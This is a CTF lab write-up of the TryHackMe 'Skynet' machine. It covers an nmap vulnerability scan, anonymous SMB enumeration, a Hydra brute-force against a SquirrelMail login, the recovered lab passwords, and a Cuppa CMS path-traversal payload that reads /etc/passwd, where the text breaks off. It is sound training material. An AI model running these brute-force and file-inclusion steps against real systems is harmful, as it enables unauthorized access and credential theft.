Writeup Tryhackme Skynet
Writeup about the Tryhackme linux machine Skynet
0 - Basic info
Linux machine
1 - Reconnaissance and enumeration
Nmap scan:
sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄 -Pn
[sudo] password for u915:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 21:32 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
| Hosts that seem down (vulnerable):
|_ 224.0.0.251
Nmap scan report for 10.10.😄
Host is up (0.036s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.😄
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.😄:80/
| Form id:
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_ /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| Apache httpd 2.4.18:
| HTTPD:F564BBA32AA088833DA032B7EB77CA29 7.5 https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
| HTTPD:E74D6161229FA3D00A1783E6C3426C5D 7.5 https://vulners.com/httpd/HTTPD:E74D6161229FA3D00A1783E6C3426C5D
| HTTPD:C7D2DA1ACB016A5220CA8E74647BED26 7.5 https://vulners.com/httpd/HTTPD:C7D2DA1ACB016A5220CA8E74647BED26
| HTTPD:8F00FB1DD7567228376803FEDB0EC3B6 7.5 https://vulners.com/httpd/HTTPD:8F00FB1DD7567228376803FEDB0EC3B6
| HTTPD:7EEE138FD834328B3FC98E4B7FCAD266 7.5 https://vulners.com/httpd/HTTPD:7EEE138FD834328B3FC98E4B7FCAD266
| HTTPD:24E96D438275A8177C289509C796525C 7.5 https://vulners.com/httpd/HTTPD:24E96D438275A8177C289509C796525C
| HTTPD:237FAB5DE739A612077A245192137A48 7.5 https://vulners.com/httpd/HTTPD:237FAB5DE739A612077A245192137A48
| HTTPD:143F3A43D871E3AFFF956DB1049A6A2A 7.5 https://vulners.com/httpd/HTTPD:143F3A43D871E3AFFF956DB1049A6A2A
| HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4 7.5 https://vulners.com/httpd/HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ *EXPLOIT*
| HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9 7.2 https://vulners.com/httpd/HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502*EXPLOIT*
| MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ *EXPLOIT*
| MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ *EXPLOIT*
| HTTPD:9CDB89FBD1162B1E462FDF5BEA375759 6.8 https://vulners.com/httpd/HTTPD:9CDB89FBD1162B1E462FDF5BEA375759
| HTTPD:13B5FCC9676077F8FD08063C83511140 6.8 https://vulners.com/httpd/HTTPD:13B5FCC9676077F8FD08063C83511140
| HTTPD:B057D0A07B0AC97248CE6210E08ACAF7 6.4 https://vulners.com/httpd/HTTPD:B057D0A07B0AC97248CE6210E08ACAF7
| HTTPD:99188FFDCAF9C4932D00C218A2E58EC7 6.4 https://vulners.com/httpd/HTTPD:99188FFDCAF9C4932D00C218A2E58EC7
| HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F 6.4 https://vulners.com/httpd/HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ *EXPLOIT*
| HTTPD:1696C4DDCBC58CE20005FCB002958C09 6.0 https://vulners.com/httpd/HTTPD:1696C4DDCBC58CE20005FCB002958C09
| HTTPD:BC81F521379C9038153151EAA84492CA 5.8 https://vulners.com/httpd/HTTPD:BC81F521379C9038153151EAA84492CA
| HTTPD:01BB9C701A4D4302EF59FA7EA89D9115 5.8 https://vulners.com/httpd/HTTPD:01BB9C701A4D4302EF59FA7EA89D9115
| EDB-ID:47689 5.8 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLOIT*
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT*
| HTTPD:F292DF1CEE1729E4240D1D62A10F5D32 5.1 https://vulners.com/httpd/HTTPD:F292DF1CEE1729E4240D1D62A10F5D32
| HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7 5.1 https://vulners.com/httpd/HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7
| HTTPD:79096CA36FAE041205EFAB66A6D4EF4B 5.1 https://vulners.com/httpd/HTTPD:79096CA36FAE041205EFAB66A6D4EF4B
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ *EXPLOIT*
| MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED *EXPLOIT*
| HTTPD:E91F31FD116386F2922B3EDA4BE3899B 5.0 https://vulners.com/httpd/HTTPD:E91F31FD116386F2922B3EDA4BE3899B
| HTTPD:E05CACB9D575871BA1E3088D02930266 5.0 https://vulners.com/httpd/HTTPD:E05CACB9D575871BA1E3088D02930266
| HTTPD:D7BF4648C333C0F770A30DEB0A23601C 5.0 https://vulners.com/httpd/HTTPD:D7BF4648C333C0F770A30DEB0A23601C
| HTTPD:D5609C15618DCADFDAD5AD396F2B83D7 5.0 https://vulners.com/httpd/HTTPD:D5609C15618DCADFDAD5AD396F2B83D7
| HTTPD:D5091608B1DC5DB5CABE405261B7658E 5.0 https://vulners.com/httpd/HTTPD:D5091608B1DC5DB5CABE405261B7658E
| HTTPD:D26626D944F16D90B877FB157E4A128F 5.0 https://vulners.com/httpd/HTTPD:D26626D944F16D90B877FB157E4A128F
| HTTPD:D0D55654F7429E8A4965CBBE30779CD6 5.0 https://vulners.com/httpd/HTTPD:D0D55654F7429E8A4965CBBE30779CD6
| HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38 5.0 https://vulners.com/httpd/HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38
| HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8 5.0 https://vulners.com/httpd/HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8
| HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6 5.0 https://vulners.com/httpd/HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6
| HTTPD:A5459AF02C9EC35CE80EA173C36C3F47 5.0 https://vulners.com/httpd/HTTPD:A5459AF02C9EC35CE80EA173C36C3F47
| HTTPD:99477914E1BE8FA85CEA0E956232C4C2 5.0 https://vulners.com/httpd/HTTPD:99477914E1BE8FA85CEA0E956232C4C2
| HTTPD:824D39D8A30F1234C966CBDA41E1C446 5.0 https://vulners.com/httpd/HTTPD:824D39D8A30F1234C966CBDA41E1C446
| HTTPD:73656ED41609146303D488C86337BC2D 5.0 https://vulners.com/httpd/HTTPD:73656ED41609146303D488C86337BC2D
| HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1 5.0 https://vulners.com/httpd/HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1
| HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5 5.0 https://vulners.com/httpd/HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5
| HTTPD:4EC9662496A151DDE6D030D9127572E7 5.0 https://vulners.com/httpd/HTTPD:4EC9662496A151DDE6D030D9127572E7
| HTTPD:42FA2547862AB3B3F5E7F776E2D90614 5.0 https://vulners.com/httpd/HTTPD:42FA2547862AB3B3F5E7F776E2D90614
| HTTPD:3647863A8E4AE972669D5EE60974E777 5.0 https://vulners.com/httpd/HTTPD:3647863A8E4AE972669D5EE60974E777
| HTTPD:18105DABC6D0ADE97D12B90F63EAE025 5.0 https://vulners.com/httpd/HTTPD:18105DABC6D0ADE97D12B90F63EAE025
| HTTPD:174A0D44882BCA7E2F229BC91D6D5A09 5.0 https://vulners.com/httpd/HTTPD:174A0D44882BCA7E2F229BC91D6D5A09
| HTTPD:04C30566E99EFB3C0D60F08EE2524591 5.0 https://vulners.com/httpd/HTTPD:04C30566E99EFB3C0D60F08EE2524591
| EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7 5.0 https://vulners.com/exploitpack/EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EXPLOITPACK:2666FB0676B4B582D689921651A30355 5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355 *EXPLOIT*
| EDB-ID:40909 5.0 https://vulners.com/exploitdb/EDB-ID:40909 *EXPLOIT*
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
| 1337DAY-ID-26574 5.0 https://vulners.com/zdt/1337DAY-ID-26574*EXPLOIT*
| MSF:ILITIES/DEBIAN-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/ *EXPLOIT*
| MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ *EXPLOIT*
| HTTPD:FF57290724543D4766EDDC4666992FE8 4.3 https://vulners.com/httpd/HTTPD:FF57290724543D4766EDDC4666992FE8
| HTTPD:F4FBBB7467F08F96828B98E753E5FE7D 4.3 https://vulners.com/httpd/HTTPD:F4FBBB7467F08F96828B98E753E5FE7D
| HTTPD:D94ACD37B5627A621B2D592BD44873F2 4.3 https://vulners.com/httpd/HTTPD:D94ACD37B5627A621B2D592BD44873F2
| HTTPD:D26FFC4C8AA598C5F130A0223836644E 4.3 https://vulners.com/httpd/HTTPD:D26FFC4C8AA598C5F130A0223836644E
| HTTPD:A5773ECB3CB67826707B252F21BB80BB 4.3 https://vulners.com/httpd/HTTPD:A5773ECB3CB67826707B252F21BB80BB
| HTTPD:86C509FC37A85DC3C01E3CE10402C6DC 4.3 https://vulners.com/httpd/HTTPD:86C509FC37A85DC3C01E3CE10402C6DC
| HTTPD:714A18409AEB3B8362DC4FA2B923CA7A 4.3 https://vulners.com/httpd/HTTPD:714A18409AEB3B8362DC4FA2B923CA7A
| HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8 4.3 https://vulners.com/httpd/HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8
| EDB-ID:47688 4.3 https://vulners.com/exploitdb/EDB-ID:47688 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT*
| MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ *EXPLOIT*
| MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ *EXPLOIT*
| HTTPD:2E568217BC35E0AA91DF49E7CE65CA67 3.5 https://vulners.com/httpd/HTTPD:2E568217BC35E0AA91DF49E7CE65CA67
| PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
| PACKETSTORM:140265 0.0 https://vulners.com/packetstorm/PACKETSTORM:140265 *EXPLOIT*
| HTTPD:B6CF5630624F83951A477D36DC8FD634 0.0 https://vulners.com/httpd/HTTPD:B6CF5630624F83951A477D36DC8FD634
| HTTPD:94C27BCF50CA81A222019B9F06735AA1 0.0 https://vulners.com/httpd/HTTPD:94C27BCF50CA81A222019B9F06735AA1
| HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2 0.0 https://vulners.com/httpd/HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2
| HTTPD:7ED2E94FC8175AF57B0B84C966E78986 0.0 https://vulners.com/httpd/HTTPD:7ED2E94FC8175AF57B0B84C966E78986
| HTTPD:55F8C86BB4FE80544B301C6F772E1F21 0.0 https://vulners.com/httpd/HTTPD:55F8C86BB4FE80544B301C6F772E1F21
| HTTPD:53F7D531D201D0209EE31F3FA8829F5B 0.0 https://vulners.com/httpd/HTTPD:53F7D531D201D0209EE31F3FA8829F5B
| HTTPD:21A860C56B7B6A55960FB17E72B7E4B4 0.0 https://vulners.com/httpd/HTTPD:21A860C56B7B6A55960FB17E72B7E4B4
| EDB-ID:46676 0.0 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| EDB-ID:42745 0.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| EDB-ID:40961 0.0 https://vulners.com/exploitdb/EDB-ID:40961 *EXPLOIT*
|_ 1337DAY-ID-531 0.0 https://vulners.com/zdt/1337DAY-ID-531 *EXPLOIT*
110/tcp open pop3 Dovecot pop3d
|_sslv2-drown:
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_sslv2-drown:
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/17%OT=22%CT=1%CU=34749%PV=Y%DS=2%DC=I%G=Y%TM=60CBA4D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=FA%TI=Z%CI=I%II=I%TS=8)OPS(O
OS:1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11N
OS:W7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R
OS:=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)
Network Distance: 2 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.60 seconds
Ports open 80,110,139,143,445
Port 80 is open but there is nothing useful on the index page, just an empty POST form.
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="shortcut icon" type="image/png" href="favicon.ico"/>
<title>Skynet</title>
</head>
<body>
<div>
<img src="image.png"/>
<form name="skynet" action="#" method="POST"><br>
<input type="search" class="search"><br>
<input type="submit" class="button" name="submit" value="Skynet Search">
<input type="submit" class="button" name="lucky" value="I'm Feeling Lucky">
</form>
</div>
</body>
</html>
Interesting path inside the port 80 /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
A login form for squirrelmail
SquirrelMail is vulnerable to RCE but it is a RCE autheticathed. So I need to find some credentials to make it work.
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
Testing the SMB port 445 with an anonymous login:
smbclient --no-pass -L //10.10.😄 1 ⨯
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
There are some shares to test, testing first the anonymous share:
smbclient --no-pass //10.10.😄/anonymous 1 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 17:04:00 2020
.. D 0 Tue Sep 17 09:20:17 2019
attention.txt N 163 Wed Sep 18 05:04:59 2019
logs D 0 Wed Sep 18 06:42:16 2019
9204224 blocks of size 1024. 5831108 blocks available
Downloading the txt file
get attention.txt
enumerating inside the path logs, there are 3 logs only one with content, downloading the log1.txt
get log1.txt
Looking into the files:
cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
So the passwords changed and probably the log file contains passwords, I can use it as a wordlist with Hydra to bruteforce the mail login form.
2 - Vulnerability Identification
Bruteforce with hydra to test my luck:
hydra -l milesdyson -P /home/u915/Escritorio/tryhackme/skynet/pass.txt 10.10.😄 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-17 22:30:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.😄:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.😄 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-17 22:30:32
Great I was lucky today, so the password for the user milesdyson is cyborg007haloterminator.
So login to the squirrel mail with the new credentials reveals an interesting mail:
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
Another password found. This time for the other share that was password protected, the personal milesdyson share.
smbclient -U milesdyson //10.10.😄/milesdyson 130 ⨯
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 11:05:47 2019
.. D 0 Wed Sep 18 05:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 11:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 11:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 11:05:14 2019
notes D 0 Tue Sep 17 11:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 11:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 11:05:14 2019
9204224 blocks of size 1024. 5830948 blocks available
Looking inside the path notes:
smb: \notes\> ls
. D 0 Tue Sep 17 11:18:40 2019
.. D 0 Tue Sep 17 11:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 11:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 11:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 11:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 11:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 11:01:29 2019
important.txt N 117 Tue Sep 17 11:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 11:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 11:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 11:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 11:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 11:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 11:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 11:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 11:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 11:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 11:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 11:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 11:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 11:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 11:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 11:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 11:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 11:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 11:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 11:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 11:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 11:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 11:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 11:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 11:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 11:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 11:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 11:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 11:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 11:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 11:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 11:01:29 2019
9204224 blocks of size 1024. 5830948 blocks available
There is inside a relevant note, important.txt. The content is the following one:
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
A new URL path is revealed: /45kra24zxs28v3yd
I enumerated the new url with Dirbuster and the medium wordlist, Dirbuster found an administration page:
Cuppa CMS:
http://10.10.😄/45kra24zxs28v3yd/administrator
The CMS is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI)
https://www.exploit-db.com/exploits/25971
3 - Exploit
SquirrelMail is vulnerable to RCE but it is a RCE autheticathed. I got the credentials but I was out of luck.
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
I tried to exploit the squirrel mail but it was not possible probably because there is a misconfiguration or something was just bad, so I moved on to the CMS exploit.
Finally I have sucess with the RFI and LFI using this exploit:
https://www.exploit-db.com/exploits/25971
Using the file alertConfigField.php and the unsanitized get parameter urlConfig.
http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php
I tested the exploit leaking the file sensitive system file /etc/passwd
http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php=urlConfig= ../../../../../../../../../etc/passwd
Field configuration:
